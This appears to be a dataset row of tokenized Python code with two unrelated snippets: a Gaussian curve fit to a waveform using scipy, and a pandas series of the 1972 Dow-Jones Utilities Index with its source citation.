"""<import_stmt>numpy<as>np<import_stmt>matplotlib.pyplot<as>plt<import_from_stmt>scipy.optimize leastsq<def_stmt>model t coeffs<block_start><return>coeffs[0]+coeffs[1]<times>np.exp(-((t-coeffs[2])/coeffs[3])<power>2)<block_end><def_stmt>residuals coeffs y t<block_start><return>y-model(t coeffs)<block_end>waveform_1=np.load('waveform_1.npy')<line_sep>t=np.arange(len(waveform_1))<line_sep>x0=np.array([3 30 15 1] dtype=float)<line_sep>x,flag=leastsq(residuals x0 args=(waveform_1 t))<line_sep>print(x)<line_sep>fig,ax=plt.subplots(figsize=(8 6))<line_sep>plt.plot(t waveform_1 t model(t x))<line_sep>plt.xlabel('Time [ns]')<line_sep>plt.ylabel('Amplitude [bins]')<line_sep>plt.legend(['Waveform' 'Model'])<line_sep>plt.show()<line_sep> |
"""
Dow-Jones Utilities Index, Aug.28--Dec.18, 1972.
Dataset described in [1]_ and included as a part of the ITSM2000 software [2]_.
Downloaded on April 22, 2019 from:
http://www.springer.com/cda/content/document/cda_downloaddocument/ITSM2000.zip
See also https://finance.yahoo.com/quote/%5EDJU/history?period1=83822400&period2=93502800&interval=1d&filter=history&frequency=1d
TODO: Add the correct business days index for this data (freq='B' does not work)
References
----------
.. [1] Brockwell, <NAME>., and <NAME>. 2016.
Introduction to Time Series and Forecasting. Springer.
.. [2] Brockwell, <NAME>., and <NAME>. n.d. ITSM2000.
"""<line_sep># noqa:E501
<import_stmt>pandas<as>pd<line_sep>dowj=pd.Series([110.94 110.69 110.43 110.56 110.75 110.84 110.46 110.56 110.46 110.05 109.6 109.31 109.31 109.25 109.02 108.54 108.77 109.02 109.44 109.38 109.53 109.89 110.56 110.56 110.72 111.23 111.48 111.58 111.9 112.19 112.06 111.96 111.68 111.36 111.42 112 112.22 112.7 113.15 114.36 114.65 115.06 115.86 116.4 116.44 116.88 118.07 118.51 119.28 119.79 119.7 119.28 119.66 120.14 120.97 121.13 121.55 121.96 122.26 123.79 124.11 124.14 123.37 123.02 122.86 123.02 123.11 123.05 123.05 122.83 123.18 122.67 122.73 122.86 122.67 122.09 122 121.23])<line_sep> |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.